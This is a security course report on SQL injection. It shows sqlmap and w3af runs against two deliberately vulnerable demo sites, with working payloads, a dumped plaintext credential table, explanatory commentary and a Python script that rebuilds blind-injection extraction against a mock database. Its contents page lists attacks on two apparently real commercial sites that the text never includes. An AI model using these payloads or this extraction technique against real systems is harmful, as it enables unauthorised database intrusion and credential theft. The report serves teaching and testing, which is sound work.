SEGURIDAD (Security)
Iván Martín Valderas

SQL INJECTION (III)


Contents

1. http://zero.webappsecurity.com (p. 2)
   A) SQLmap (p. 2)
   B) W3af (p. 8)
2. http://crackme.cenzic.com/Kelev/view/home.php (p. 10)
   A) SQLmap (p. 10)
   B) W3af (p. 13)
3. Others (p. 14)
   http://www.arocariaflowers.com/article.php?id=%275 (p. 14)
   A) SQLmap (p. 14)
   B) W3af (p. 15)
   http://www.bloomhealth.net/news/article.php?id='48 (p. 16)
   A) SQLmap (p. 16)
   B) W3af (p. 17)


1. http://zero.webappsecurity.com

A) SQLmap

root@bt:/pentest/database/sqlmap# python sqlmap.py -u "http://zero.webappsecurity.com/forgot1.asp?get=email@address.com" --level=3 --risk=3 --flush-session --technique=B --batch
[*] starting at: 15:19:19
[15:19:19] [INFO] using '/home/stamparm/Work/sqlmap/trunk/sqlmap/output/zero.webappsecurity.com/session' as session file
[15:19:19] [INFO] flushing session file
[15:19:19] [INFO] testing connection to the target url
[15:19:20] [INFO] heuristics detected web page charset 'ascii'
[15:19:20] [INFO] sqlmap got a 302 redirect to 'http://zero.webappsecurity.com:80/forgot2.asp'. do you want to follow redirects from now on (or stay on the original page)? [Y/n] Y
[15:19:20] [INFO] testing if the url is stable, wait a few seconds
[15:19:23] [INFO] url is stable
[15:19:23] [INFO] testing if GET parameter 'get' is dynamic
[15:19:24] [WARNING] GET parameter 'get' appears to be not dynamic
[15:19:25] [WARNING] heuristic test shows that GET parameter 'get' might not be injectable
[15:19:25] [INFO] testing sql injection on GET parameter 'get'
[15:19:25] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[15:20:09] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause'
[15:20:41] [INFO] GET parameter 'get' is 'OR boolean-based blind - WHERE or HAVING clause' injectable
[15:20:41] [INFO] checking if the injection point on GET parameter 'get' is a false positive
[15:20:44] [INFO] GET parameter 'get' is vulnerable. Do you want to keep testing the others? [y/N] N
sqlmap identified the following injection points with a total of 88 HTTP(s) requests:
---
Place: GET
Parameter: get
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause
Payload: get=-9653' OR NOT (7754=7754) AND 'cxJP'='cxJP
---
[15:20:44] [INFO] manual usage of GET payloads requires url encoding
[15:20:44] [INFO] testing Microsoft Access
[15:20:45] [INFO] confirming Microsoft Access
[15:20:46] [INFO] the back-end DBMS is Microsoft Access
web server operating system: Windows 2003
web application technology: ASP.NET, Microsoft IIS 6.0
back-end DBMS: Microsoft Access
[15:20:46] [WARNING] HTTP error codes detected during testing:
500 (Internal Server Error) - 24 times
[15:20:46] [INFO] Fetched data logged to text files under '/home/stamparm/Work/sqlmap/trunk/sqlmap/output/zero.webappsecurity.com'

Here sqlmap was restricted to boolean-based blind tests (--technique=B) and told to take the default answer at every prompt (--batch). The 'get' parameter "appears to be not dynamic" because the page looks the same for any e-mail address that does not exist in the table; the OR-based payload still works because the tautology makes the WHERE clause match, so the "true" and "false" forms of the payload produce two distinguishable pages, which is all a boolean-blind oracle needs. Note that the AND-based test, which sqlmap tries first, failed for the same reason: with a non-existent e-mail as baseline there is no "true" page to compare against until the OR form supplies one.


root@bt:/pentest/database/sqlmap# python sqlmap.py -u "http://zero.webappsecurity.com/forgot1.asp?get=email@address.com" --batch --tables --threads=8
[*] starting at: 15:26:44
[15:26:44] [INFO] using '/home/stamparm/Work/sqlmap/trunk/sqlmap/output/zero.webappsecurity.com/session' as session file
[15:26:44] [INFO] resuming injection data from session file
[15:26:44] [INFO] resuming back-end DBMS 'microsoft access' from session file
[15:26:57] [INFO] testing connection to the target url
[15:26:58] [INFO] heuristics detected web page charset 'ascii'
[15:26:58] [INFO] sqlmap got a 302 redirect to 'http://zero.webappsecurity.com:80/forgot2.asp'. do you want to follow redirects from now on (or stay on the original page)? [Y/n] Y
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: get
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause
Payload: get=-9653' OR NOT (7754=7754) AND 'cxJP'='cxJP
---
[15:26:58] [INFO] manual usage of GET payloads requires url encoding
[15:26:58] [INFO] the back-end DBMS is Microsoft Access
web server operating system: Windows 2003
web application technology: ASP.NET, Microsoft IIS 6.0
back-end DBMS: Microsoft Access
[15:26:58] [INFO] fetching tables for database: `Microsoft_Access_masterdb`
[15:26:58] [INFO] fetching number of tables for database '`Microsoft_Access_masterdb`'
[15:26:59] [INFO] retrieved:
[15:27:01] [WARNING] unable to retrieve the number of tables for database '`Microsoft_Access_masterdb`'
[15:27:01] [ERROR] cannot retrieve table names, back-end DBMS is Access
[15:27:01] [INFO] do you want to use common table existence check? [Y/n/q] Y
[15:27:01] [INFO] checking table existence using items from '/home/stamparm/Work/sqlmap/trunk/sqlmap/txt/common-tables.txt'
[15:27:01] [INFO] adding words used on web page to the check list
[15:27:01] [INFO] starting 8 threads
[15:28:56] [INFO] retrieved: password

Database: Microsoft_Access_masterdb
[1 table]
+----------+
| password |
+----------+

[15:30:22] [WARNING] HTTP error codes detected during testing:
500 (Internal Server Error) - 3091 times
[15:30:22] [INFO] Fetched data logged to text files under '/home/stamparm/Work/sqlmap/trunk/sqlmap/output/zero.webappsecurity.com'
[*] shutting down at: 15:30:22

Microsoft Access exposes no catalog (nothing like information_schema) that the injection can read, so sqlmap cannot list tables and falls back to guessing names from its common-tables.txt wordlist (plus words scraped from the page). Every guess for a table that does not exist produces a SQL error, which is why this single step logged 3091 HTTP 500 responses. Eight threads make it faster and also louder: thousands of 500s from one client within minutes in the IIS log is an easy thing to alert on.


root@bt:/pentest/database/sqlmap# python sqlmap.py -u "http://zero.webappsecurity.com/forgot1.asp?get=email@address.com" --batch --columns -T password --threads=8
[15:30:38] [INFO] using '/home/stamparm/Work/sqlmap/trunk/sqlmap/output/zero.webappsecurity.com/session' as session file
[15:30:38] [INFO] resuming injection data from session file
[15:30:38] [INFO] resuming back-end DBMS 'microsoft access' from session file
[15:30:38] [INFO] resuming brute forced table name 'password' from session file
[15:30:48] [INFO] testing connection to the target url
[15:30:49] [INFO] heuristics detected web page charset 'ascii'
[15:30:49] [INFO] sqlmap got a 302 redirect to 'http://zero.webappsecurity.com:80/forgot2.asp'. do you want to follow redirects from now on (or stay on the original page)? [Y/n] Y
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: get
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause
Payload: get=-9653' OR NOT (7754=7754) AND 'cxJP'='cxJP
---
[15:30:49] [INFO] manual usage of GET payloads requires url encoding
[15:30:49] [INFO] the back-end DBMS is Microsoft Access
web server operating system: Windows 2003
web application technology: ASP.NET, Microsoft IIS 6.0
back-end DBMS: Microsoft Access
[15:30:49] [ERROR] cannot retrieve column names, back-end DBMS is Access
[15:30:49] [INFO] do you want to use common columns existence check? [Y/n/q] Y
[15:30:49] [INFO] checking column existence using items from '/home/stamparm/Work/sqlmap/trunk/sqlmap/txt/common-columns.txt'
[15:30:49] [INFO] starting 8 threads
[15:30:52] [INFO] retrieved: name
[15:30:56] [INFO] retrieved: country
[15:30:59] [INFO] retrieved: surname
[15:31:25] [INFO] retrieved: pass
[15:31:25] [INFO] retrieved: user
[15:31:32] [INFO] retrieved: admin
[15:32:53] [INFO] retrieved: active

Database: `Microsoft_Access_masterdb`
Table: password
[7 columns]
+---------+-------------+
| Column  | Type        |
+---------+-------------+
| active  | non-numeric |
| admin   | non-numeric |
| country | non-numeric |
| name    | non-numeric |
| pass    | non-numeric |
| surname | non-numeric |
| user    | non-numeric |
+---------+-------------+

[15:33:31] [WARNING] HTTP error codes detected during testing:
500 (Internal Server Error) - 2442 times
[15:33:31] [INFO] Fetched data logged to text files under '/home/stamparm/Work/sqlmap/trunk/sqlmap/output/zero.webappsecurity.com'


root@bt:/pentest/database/sqlmap# python sqlmap.py -u "http://zero.webappsecurity.com/forgot1.asp?get=email@address.com" --batch --dump -T password -C admin,pass,surname,user --threads=8 --fresh-queries
[15:39:41] [INFO] using '/home/stamparm/Work/sqlmap/trunk/sqlmap/output/zero.webappsecurity.com/session' as session file
[15:39:41] [INFO] resuming injection data from session file
[15:39:41] [INFO] resuming back-end DBMS 'microsoft access' from session file
[15:39:41] [INFO] resuming brute forced table name 'password' from session file
[15:39:41] [INFO] resuming brute forced column name 'name' for table 'password' from session file
[15:39:41] [INFO] resuming brute forced column name 'country' for table 'password' from session file
[15:39:41] [INFO] resuming brute forced column name 'surname' for table 'password' from session file
[15:39:41] [INFO] resuming brute forced column name 'pass' for table 'password' from session file
[15:39:41] [INFO] resuming brute forced column name 'user' for table 'password' from session file
[15:39:41] [INFO] resuming brute forced column name 'admin' for table 'password' from session file
[15:39:41] [INFO] resuming brute forced column name 'active' for table 'password' from session file
[15:39:41] [INFO] resuming brute forced column name 'name' for table 'password' from session file
[15:39:53] [INFO] testing connection to the target url
[15:39:54] [INFO] heuristics detected web page charset 'ascii'
[15:39:54] [INFO] sqlmap got a 302 redirect to 'http://zero.webappsecurity.com:80/forgot2.asp'. do you want to follow redirects from now on (or stay on the original page)? [Y/n] Y
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: get
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause
Payload: get=-9653' OR NOT (7754=7754) AND 'cxJP'='cxJP
---
[15:39:55] [INFO] manual usage of GET payloads requires url encoding
[15:39:55] [INFO] the back-end DBMS is Microsoft Access
web server operating system: Windows 2003
web application technology: ASP.NET, Microsoft IIS 6.0
back-end DBMS: Microsoft Access
[15:39:55] [ERROR] cannot retrieve column names, back-end DBMS is Access
[15:39:55] [INFO] fetching column(s) 'admin, surname, user, pass' entries for table 'password' on database 'Microsoft_Access_masterdb'
[15:39:55] [INFO] fetching number of columns 'admin, surname, user, pass' entries for table 'password' on database 'Microsoft_Access_masterdb'
[15:39:56] [INFO] retrieved: 73
[15:40:04] [INFO] fetching number of distinct values for column 'user'
[15:40:04] [INFO] retrieved: 7
[15:40:12] [INFO] fetching number of distinct values for column 'pass'
[15:40:12] [INFO] retrieved: 6
[15:40:21] [INFO] fetching number of distinct values for column 'admin'
[15:40:21] [INFO] retrieved: 2
[15:40:29] [INFO] fetching number of distinct values for column 'surname'
[15:40:29] [INFO] retrieved: 5
[15:40:36] [WARNING] no proper pivot column provided (with unique values). all rows can't be retrieved.
[15:40:36] [INFO] retrieving the length of query output
[15:40:36] [INFO] retrieved: 11
[15:40:51] [INFO] retrieved: 576-11-1121
[15:40:51] [INFO] retrieving the length of query output
[15:40:51] [INFO] retrieved: 4
[15:41:04] [INFO] retrieved: pass
[15:41:04] [INFO] retrieving the length of query output
[15:41:04] [INFO] retrieved: 2
[15:41:14] [INFO] retrieved: no
[15:41:14] [INFO] retrieving the length of query output
[15:41:14] [INFO] retrieved: 5
[15:41:25] [INFO] retrieved: Shawn
[15:41:25] [INFO] retrieving the length of query output
[15:41:25] [INFO] retrieved: 11
[15:41:41] [INFO] retrieved: 576-14-1122
[15:41:41] [INFO] retrieving the length of query output
[15:41:41] [INFO] retrieved: 5
[15:41:51] [INFO] retrieved: divad
[15:41:51] [INFO] retrieving the length of query output
[15:41:51] [INFO] retrieved: 2
[15:42:02] [INFO] retrieved: no
[15:42:02] [INFO] retrieving the length of query output
[15:42:02] [INFO] retrieved:
[15:42:03] [INFO] retrieved:
[15:42:06] [INFO] retrieving the length of query output
[15:42:06] [INFO] retrieved: 11
[15:42:22] [INFO] retrieved: 592-11-8393
[15:42:22] [INFO] retrieving the length of query output
[15:42:22] [INFO] retrieved: 4
[15:42:32] [INFO] retrieved: pass
[15:42:32] [INFO] retrieving the length of query output
[15:42:32] [INFO] retrieved: 2
[15:42:43] [INFO] retrieved: no
[15:42:43] [INFO] retrieving the length of query output
[15:42:43] [INFO] retrieved:
[15:42:44] [INFO] retrieved:
[15:42:47] [INFO] retrieving the length of query output
[15:42:47] [INFO] retrieved: 11
[15:43:03] [INFO] retrieved: 991-99-8765
[15:43:03] [INFO] retrieving the length of query output
[15:43:03] [INFO] retrieved: 14
[15:43:21] [INFO] retrieved: canwehavemoney
[15:43:21] [INFO] retrieving the length of query output
[15:43:21] [INFO] retrieved: 2
[15:43:31] [INFO] retrieved: no
[15:43:31] [INFO] retrieving the length of query output
[15:43:31] [INFO] retrieved:
[15:43:33] [INFO] retrieved:
[15:43:36] [INFO] retrieving the length of query output
[15:43:36] [INFO] retrieved: 5
[15:43:46] [INFO] retrieved: admin
[15:43:46] [INFO] retrieving the length of query output
[15:43:46] [INFO] retrieved: 5
[15:43:57] [INFO] retrieved: admin
[15:43:57] [INFO] retrieving the length of query output
[15:43:57] [INFO] retrieved: 3
[15:44:08] [INFO] retrieved: yes
[15:44:08] [INFO] retrieving the length of query output
[15:44:08] [INFO] retrieved: 5
[15:44:20] [INFO] retrieved: Admin
[15:44:20] [INFO] retrieving the length of query output
[15:44:20] [INFO] retrieved: 13
[15:44:44] [INFO] retrieved: [email protected]
[15:44:44] [INFO] retrieving the length of query output
[15:44:44] [INFO] retrieved: 10
[15:45:02] [INFO] retrieved: bleh88bleh
[15:45:02] [INFO] retrieving the length of query output
[15:45:02] [INFO] retrieved: 2
[15:45:12] [INFO] retrieved: no
[15:45:12] [INFO] retrieving the length of query output
[15:45:12] [INFO] retrieved: 8
[15:45:24] [INFO] retrieved: blehbleh
[15:45:24] [INFO] retrieving the length of query output
[15:45:24] [INFO] retrieved: 4
[15:45:33] [INFO] retrieved: user
[15:45:33] [INFO] retrieving the length of query output
[15:45:33] [INFO] retrieved: 4
[15:45:42] [INFO] retrieved: user
[15:45:42] [INFO] retrieving the length of query output
[15:45:42] [INFO] retrieved: 2
[15:45:53] [INFO] retrieved: no
[15:45:53] [INFO] retrieving the length of query output
[15:45:53] [INFO] retrieved: 4
[15:46:02] [INFO] retrieved: User
[15:46:02] [INFO] retrieving the length of query output
[15:46:02] [INFO] retrieved:
[15:46:03] [INFO] retrieved:

Database: Microsoft_Access_masterdb
Table: password
[7 entries]
+-------+----------------+----------+-------------------+
| admin | pass           | surname  | user              |
+-------+----------------+----------+-------------------+
| no    | pass           | Shawn    | 576-11-1121       |
| no    | divad          | NULL     | 576-14-1122       |
| no    | pass           | NULL     | 592-11-8393       |
| no    | canwehavemoney | NULL     | 991-99-8765       |
| yes   | admin          | Admin    | admin             |
| no    | bleh88bleh     | blehbleh | [email protected] |
| no    | user           | User     | user              |
+-------+----------------+----------+-------------------+

[15:46:06] [INFO] Table 'Microsoft_Access_masterdb.password' dumped to CSV file '/home/stamparm/Work/sqlmap/trunk/sqlmap/output/zero.webappsecurity.com/dump/Microsoft_Access_masterdb/password.csv'
[15:46:06] [WARNING] HTTP error codes detected during testing:
500 (Internal Server Error) - 715 times
[15:46:06] [INFO] Fetched data logged to text files under '/home/stamparm/Work/sqlmap/trunk/sqlmap/output/zero.webappsecurity.com'

The log shows what a boolean-blind dump costs: for every cell sqlmap first infers the length of the value, then the value itself, character by character, each inference being a series of yes/no questions answered by comparing pages. The "no proper pivot column" warning matters: sqlmap walks a table through a column with unique values, and without one, rows that share or lack a value can be merged or skipped, so the 7 entries should not be taken as the complete table. The dump also shows the second finding, beyond the injection itself: passwords stored in clear text (admin/admin, user/user).

Reference: http://unconciousmind.blogspot.com/2011/05/sqlmap-vs-webappsecurity-testing-web.html


B) W3af

First we configure the tool, in console mode, from BackTrack 5:

w3af>>> plugins

w3af/plugins>>> audit sqli

w3af/plugins>>> output console,textFile

w3af/plugins>>> output config textFile

w3af/plugins/output/config:textFile>>> set fileName prueba.txt

w3af/plugins/output/config:textFile>>> back

w3af/plugins>>> back

We run a scan:

w3af>>> target

w3af/config:target>>> set target http://zero.webappsecurity.com

w3af/config:target>>> back

w3af>>> start

Auto-enabling plugin: grep.error500
Found 3 URLs and 5 different points of injection.
The list of URLs is:
- http://zero.webappsecurity.com
- http://zero.webappsecurity.com/login1.asp
- http://zero.webappsecurity.com/rootlogin.asp
The list of fuzzable requests is:
- http://zero.webappsecurity.com | Method: GET
- http://zero.webappsecurity.com/login1.asp | Method: POST | Parameters: (login="", password="", graphicOption="minimum")
- http://zero.webappsecurity.com/login1.asp | Method: POST | Parameters: (login="", password="", graphicOption="minimum", graphicOption="standard")
- http://zero.webappsecurity.com/login1.asp | Method: POST | Parameters: (login="", password="", graphicOption="standard")
- http://zero.webappsecurity.com/rootlogin.asp | Method: POST | Parameters: (txtPassPhrase="", txtHidden="This was h...", txtName="")

A SQL error was found in the response supplied by the web application, the error is (only a fragment is shown): "'80040e14'". The error was found on response with id 23.

A SQL error was found in the response supplied by the web application, the error is (only a fragment is shown): "Microsoft OLE DB Provider for ODBC Drivers". The error was found on response with id 23.

A SQL error was found in the response supplied by the web application, the error is (only a fragment is shown): "[Microsoft][ODBC Microsoft Access Driver]". The error was found on response with id 23.

SQL injection in a Microsoft SQL database was found at: "http://zero.webappsecurity.com/login1.asp", using HTTP method POST. The sent post-data was: "login=d'z"0&password=FrAmE30.&graphicOption=minimum&graphicOption=standard". The modified parameter was "login". This vulnerability was found in the request with id 23.

Scan finished in 20 seconds.

w3af>>>

Two things are worth noting in this result. First, w3af labels the finding "Microsoft SQL database", but the fragments it matched ("'80040e14'", "Microsoft OLE DB Provider for ODBC Drivers", "[Microsoft][ODBC Microsoft Access Driver]") are the Access ODBC driver's error text, which agrees with sqlmap's fingerprint of Microsoft Access; w3af's audit.sqli plugin detects injection by matching error strings in the response and does not fingerprint the engine the way sqlmap does. Second, this is a different injection point from the one sqlmap exploited: the POST parameter login of login1.asp rather than the GET parameter get of forgot1.asp, found with a single malformed value (d'z"0) because the application echoes the database error.

Reference: http://www.pentester.es/2010/02/auditoria-web-w3af-en-el-dojo.html


2. http://crackme.cenzic.com/Kelev/view/home.php

A) SQLmap

root@bt:/pentest/database/sqlmap# python sqlmap.py -u "http://crackme.cenzic.com/Kelev/view/updateloanrequest.php" --data "txtFirstName=Joza&txtLastName=Jozic&txtSocialScurityNo=112-12-3222&txtDOB=1981-11-11&txtAddress=Gornje+Jelenje+3&txtCity=BlizuTamo&drpState=&txtTelephoneNo=&txtEmail=joza.jozic%40gmail.com&txtAnnualIncome=10212&drpLoanType=Home&sendbutton1=Submit" --batch --banner --flush-session -p txtAnnualIncome --level=3 --risk=3
[16:52:00] [INFO] using 'pentest/database/sqlmap/output/crackme.cenzic.com/session' as session file
[16:52:00] [INFO] flushing session file
[16:52:00] [INFO] testing connection to the target url
[16:52:01] [INFO] testing if the url is stable, wait a few seconds
[16:52:03] [INFO] url is stable
[16:52:04] [INFO] heuristic test shows that POST parameter 'txtAnnualIncome' might be injectable (possible DBMS: MySQL)
[16:52:04] [INFO] testing sql injection on POST parameter 'txtAnnualIncome'
[16:52:04] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[16:52:39] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause'
[16:53:41] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (Generic comment)'
[16:54:31] [INFO] testing 'Generic boolean-based blind - Parameter replace (original value)'
[16:54:33] [INFO] testing 'Generic boolean-based blind - GROUP BY and ORDER BY clauses'
[16:54:35] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (MySQL comment)'
[16:55:40] [INFO] testing 'MySQL boolean-based blind - WHERE or HAVING clause (RLIKE)'
[16:56:15] [INFO] testing 'MySQL boolean-based blind - Parameter replace (MAKE_SET - original value)'
[16:56:18] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace (original value)'
[16:56:20] [INFO] testing 'MySQL >= 5.0 boolean-based blind - GROUP BY and ORDER BY clauses'
[16:56:22] [INFO] testing 'MySQL stacked conditional-error blind queries'
[16:57:06] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'
[16:57:23] [INFO] testing 'MySQL >= 4.1 AND error-based - WHERE or HAVING clause'
[16:57:41] [INFO] testing 'MySQL >= 5.0 OR error-based - WHERE or HAVING clause'
[16:58:15] [INFO] testing 'MySQL >= 4.1 OR error-based - WHERE or HAVING clause'
[16:59:00] [INFO] testing 'MySQL OR error-based - WHERE or HAVING clause'
[16:59:37] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace'
[16:59:38] [INFO] testing 'MySQL >= 5.0 error-based - GROUP BY and ORDER BY clauses'
[16:59:39] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[16:59:57] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query)'
[17:00:13] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
[17:00:32] [INFO] testing 'MySQL < 5.0.12 AND time-based blind (heavy query)'
[17:01:32] [INFO] POST parameter 'txtAnnualIncome' is 'MySQL < 5.0.12 AND time-based blind (heavy query)' injectable
[17:01:32] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[17:01:44] [INFO] testing 'MySQL UNION query (random number) - 1 to 10 columns'
[17:01:53] [INFO] testing 'MySQL UNION query (NULL) - 11 to 20 columns'
[17:02:03] [INFO] testing 'MySQL UNION query (random number) - 11 to 20 columns'
[17:02:12] [INFO] testing 'MySQL UNION query (NULL) - 21 to 30 columns'
[17:02:22] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[17:02:31] [INFO] testing 'Generic UNION query (random number) - 1 to 10 columns'
[17:02:40] [INFO] testing 'Generic UNION query (NULL) - 11 to 20 columns'
[17:02:50] [INFO] testing 'Generic UNION query (random number) - 11 to 20 columns'
[17:03:05] [INFO] target url appears to be UNION injectable with 12 columns
[17:03:31] [WARNING] if UNION based SQL injection is not detected, please consider providing --union-char switch (e.g. --union-char=1) and/or try to force the back-end DBMS (e.g. --dbms=mysql)
[17:03:31] [INFO] testing 'Generic UNION query (NULL) - 21 to 30 columns'
[17:03:40] [INFO] checking if the injection point on POST parameter 'txtAnnualIncome' is a false positive
POST parameter 'txtAnnualIncome' is vulnerable. Do you want to keep testing the others? [y/N] N
sqlmap identified the following injection points with a total of 619 HTTP(s) requests:
---
Place: POST
Parameter: txtAnnualIncome
Type: AND/OR time-based blind
Title: MySQL < 5.0.12 AND time-based blind (heavy query)
Payload: txtFirstName=Joza&txtLastName=Jozic&txtSocialScurityNo=112-12-3222&txtDOB=1981-11-11&txtAddress=Gornje Jelenje 3&txtCity=BlizuTamo&drpState=&txtTelephoneNo=&txtEmail=joza.jozic@gmail.com&txtAnnualIncome=10212 AND 7764=BENCHMARK(5000000,MD5(CHAR(83,69,77,114)))&drpLoanType=Home&sendbutton1=Submit
---
[17:04:37] [INFO] testing MySQL
[17:05:01] [INFO] confirming MySQL
[17:05:50] [WARNING] adjusting time delay to 3 seconds (due to good response times)
[17:05:50] [INFO] the back-end DBMS is MySQL
[17:05:50] [INFO] fetching banner
[17:05:50] [INFO] retrieved: 4.0.18-nt

web server operating system: Windows
web application technology: Apache 2.0.49, PHP 4.3.7
back-end DBMS operating system: Windows
back-end DBMS: MySQL < 5.0.0
banner: '4.0.18-nt'

Here the whole form is sent with --data and only txtAnnualIncome is tested (-p), with every payload family enabled (--level=3 --risk=3). The banner 4.0.18-nt explains the technique that succeeded: SLEEP() only exists from MySQL 5.0.12, so on this server sqlmap stalls the query with the "heavy query" BENCHMARK(5000000, MD5(...)) and infers each answer from the response time. Note that sqlmap also saw the endpoint as UNION-injectable with 12 columns but could not confirm it; following the warning (--union-char, or --dbms=mysql) would be the next step, because UNION extraction returns whole values in one response while the timing oracle needs a statistical model and, here, a 3-second delay for every "true" answer.


root@bt:/pentest/database/sqlmap# python sqlmap.py -u "http://crackme.cenzic.com/Kelev/view/updateloanrequest.php" --data "txtFirstName=Joza&txtLastName=Jozic&txtSocialScurityNo=112-12-3222&txtDOB=1981-11-11&txtAddress=Gornje+Jelenje+3&txtCity=BlizuTamo&drpState=&txtTelephoneNo=&txtEmail=joza.jozic%40gmail.com&txtAnnualIncome=10212&drpLoanType=Home&sendbutton1=Submit" --batch --current-db
[17:16:15] [INFO] using 'pentest/database/sqlmap/output/crackme.cenzic.com/session' as session file
[17:16:15] [INFO] resuming injection data from session file
[17:16:15] [INFO] resuming back-end DBMS 'mysql 4' from session file
[17:16:15] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: POST
Parameter: txtAnnualIncome
Type: AND/OR time-based blind
Title: MySQL < 5.0.12 AND time-based blind (heavy query)
Payload: txtFirstName=Joza&txtLastName=Jozic&txtSocialScurityNo=112-12-3222&txtDOB=1981-11-11&txtAddress=Gornje Jelenje 3&txtCity=BlizuTamo&drpState=&txtTelephoneNo=&txtEmail=joza.jozic@gmail.com&txtAnnualIncome=10212 AND 7764=BENCHMARK(5000000,MD5(CHAR(83,69,77,114)))&drpLoanType=Home&sendbutton1=Submit
---
[17:16:16] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: Apache 2.0.49, PHP 4.3.7
back-end DBMS: MySQL 4
[17:16:16] [INFO] fetching current database
[17:16:16] [WARNING] time-based comparison needs larger statistical model. Making a few dummy requests, please wait..
[17:17:42] [WARNING] adjusting time delay to 1 second (due to good response times)
bank
current database: 'bank'
[17:16:31] [INFO] Fetched data logged to text files under '/pentest/database/sqlmap/output/crackme.cenzic.com'
[*] shutting down at 17:16:31

Reference: http://unconciousmind.blogspot.com/2011/06/sqlmap-vs-cenzic-php-testing-web-server.html
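Both sqlmap runs above pull data out one yes/no question at a time. On zero.webappsecurity.com (section 1.A) the oracle is the content of the page: the "true" and "false" forms of the payload render different pages. On crackme.cenzic.com (section 2.A) the page never changes and the oracle is the response time, with BENCHMARK() standing in for the SLEEP() that MySQL 4.0 lacks. The script below is an added example, not code from this report, from sqlmap or from the blog posts referenced; it rebuilds both oracles against a mock of the vulnerable lookup on an in-memory SQLite database and then recovers a column value the way the "retrieving the length of query output / retrieved:" lines show, length first and then each character by binary search. Everything it assumes is a stand-in: SQLite instead of Access/MySQL, a registered SLEEP() instead of BENCHMARK(), invented "Password sent"/"Unknown user" responses for forgot1.asp, and a password table filled with three rows constructed from the dump in section 1.A.

```python
"""Boolean- and time-based blind SQL injection, rebuilt against a mock of the pages above.

Added example, not from the original report. SQLite stands in for Access/MySQL, a
registered SLEEP() for MySQL's BENCHMARK() heavy query, and the table contents are
constructed from the dump of the 'password' table shown earlier.
"""
import sqlite3
import time

# Constructed sample rows (user, pass, admin), taken from the dumped 'password' table.
ROWS = [
    ("admin", "admin", "yes"),
    ("user", "user", "no"),
    ("576-11-1121", "pass", "no"),
]
BASELINE_USER = "user"        # a value that exists: the "true" page for the boolean oracle
SLEEP_SECONDS = 0.3           # delay the time-based payload asks the server for
SLOW_THRESHOLD = SLEEP_SECONDS / 2


def build_db():
    conn = sqlite3.connect(":memory:", check_same_thread=False)
    conn.execute("CREATE TABLE password (user TEXT, pass TEXT, admin TEXT)")
    conn.executemany("INSERT INTO password VALUES (?, ?, ?)", ROWS)
    # SQLite has neither BENCHMARK() nor SLEEP(); register one so a payload can stall.
    conn.create_function("SLEEP", 1, lambda s: time.sleep(s) or 0)
    return conn


CONN = build_db()


def vulnerable_lookup(user_input):
    """Mock of forgot1.asp?get=...: the parameter is concatenated straight into the SQL."""
    sql = "SELECT user FROM password WHERE user = '" + user_input + "'"
    try:
        found = CONN.execute(sql).fetchone() is not None
    except sqlite3.Error:
        return "HTTP 500"      # broken query; the runs above logged thousands of these
    return "Password sent" if found else "Unknown user"


def safe_lookup(user_input):
    """Same query with a bound parameter: the payload can only ever be a user name."""
    row = CONN.execute("SELECT user FROM password WHERE user = ?", (user_input,)).fetchone()
    return "Password sent" if row else "Unknown user"


def boolean_oracle(condition):
    """True iff the injected condition holds, judged by page content (boolean-based blind).

    Same shape as sqlmap's payload above: value' AND (<condition>) AND 'x'='x
    """
    payload = BASELINE_USER + "' AND (" + condition + ") AND 'x'='x"
    return vulnerable_lookup(payload) == vulnerable_lookup(BASELINE_USER)


def time_oracle(condition):
    """True iff the condition holds, judged by response time alone (time-based blind).

    Stand-in for sqlmap's 10212 AND 7764=BENCHMARK(5000000,MD5(...)) on MySQL < 5.0.12.
    """
    payload = ("nobody' OR (SELECT CASE WHEN (" + condition + ") THEN SLEEP("
               + str(SLEEP_SECONDS) + ") ELSE 0 END) = 1 AND 'x'='x")
    start = time.monotonic()
    vulnerable_lookup(payload)            # the page itself is identical either way
    return time.monotonic() - start >= SLOW_THRESHOLD


def extract(oracle, subquery, max_len=64):
    """Recover the string a subquery returns, as the sqlmap log shows: the length first,
    then each character by binary search over its code point (about 7 requests each)."""
    lo, hi = 0, max_len
    while lo < hi:
        mid = (lo + hi) // 2
        if oracle("LENGTH((" + subquery + ")) > " + str(mid)):
            lo = mid + 1
        else:
            hi = mid
    length = lo
    out = ""
    for pos in range(1, length + 1):
        lo, hi = 0, 127
        while lo < hi:
            mid = (lo + hi) // 2
            if oracle("UNICODE(SUBSTR((" + subquery + "), " + str(pos) + ", 1)) > " + str(mid)):
                lo = mid + 1
            else:
                hi = mid
        out += chr(lo)
    return out


def tautology_results():
    """The classic OR tautology: a hit on the vulnerable endpoint, nothing on the safe one."""
    payload = "x' OR 'a'='a"
    return vulnerable_lookup(payload), safe_lookup(payload)


if __name__ == "__main__":
    target = "SELECT pass FROM password WHERE user = 'admin'"
    print("boolean-based blind:", extract(boolean_oracle, target))
    # The timing oracle answers the same questions, one delay per "true" answer, so it is slow.
    print("time-based blind:", extract(time_oracle, "SELECT admin FROM password WHERE user = 'admin'"))
    print("vulnerable vs parameterised:", tautology_results())
```

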